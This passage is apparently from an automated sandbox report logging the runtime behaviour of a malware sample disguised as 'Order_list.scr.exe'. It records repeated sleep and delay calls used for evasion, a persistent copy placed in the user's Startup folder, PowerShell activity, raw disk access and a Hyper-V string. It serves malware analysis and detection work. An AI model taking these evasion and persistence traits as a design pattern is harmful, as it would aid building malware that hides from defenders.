            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4320Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -31359464925306218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6628Thread sleep count: 2755 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -599824s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -599699s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -599593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -599484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6628Thread sleep count: 7088 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -599375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -599265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -599156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -599046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -598936s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -598828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -598718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -598609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -598500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -598390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -598281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -598172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -598062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -597953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -597843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -597734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -597625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -597515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -597382s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -597265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -597137s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -596853s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -596734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -596625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -596511s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -596406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -596296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -596187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -596077s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -595952s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -595843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -594968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -594750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -594640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -594531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -594417s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -594305s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exe TID: 6384Thread sleep time: -594181s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 6712Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 7276Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6288Thread sleep count: 3993 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6240Thread sleep count: 1762 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2648Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6820Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -31359464925306218s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7248Thread sleep count: 2557 > 30Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -599594s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -599469s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7248Thread sleep count: 7292 > 30Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -599359s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -599250s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -599140s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -599030s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -598897s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -598797s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -598469s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -598225s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -598109s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -597890s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -597672s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -597562s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -597453s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -597343s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -597225s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -597109s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -597000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -596890s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -596781s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -596672s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -596562s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -596453s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -596344s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -596234s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -596125s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -596015s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -595906s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -595797s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -595687s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -595578s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -595468s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -595359s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -595250s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -595140s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -595031s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -594922s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -594812s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -594703s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -594594s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -594484s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -594375s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7236Thread sleep time: -594265s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599824Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599699Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599593Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599484Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599375Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599265Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599156Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 599046Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598936Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598828Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598718Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598609Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598500Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598390Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598281Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598172Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 598062Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597843Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597734Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597625Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597515Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597382Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 597137Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596853Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596511Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596296Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 596077Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595952Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594531Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594417Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594305Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeThread delayed: delay time: 594181Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 599594Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 599469Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 599359Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 599250Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 599140Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 599030Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598897Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598797Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598469Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598225Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597343Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597225Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596234Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 596015Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595906Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595797Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595687Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595468Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595359Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595250Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595140Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 595031Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 594812Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 594703Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 594594Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 594484Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 594375Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeThread delayed: delay time: 594265Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
            Source: svchost.exe, 00000004.00000002.3323487629.0000023A69A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3325003667.0000023A6F055000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
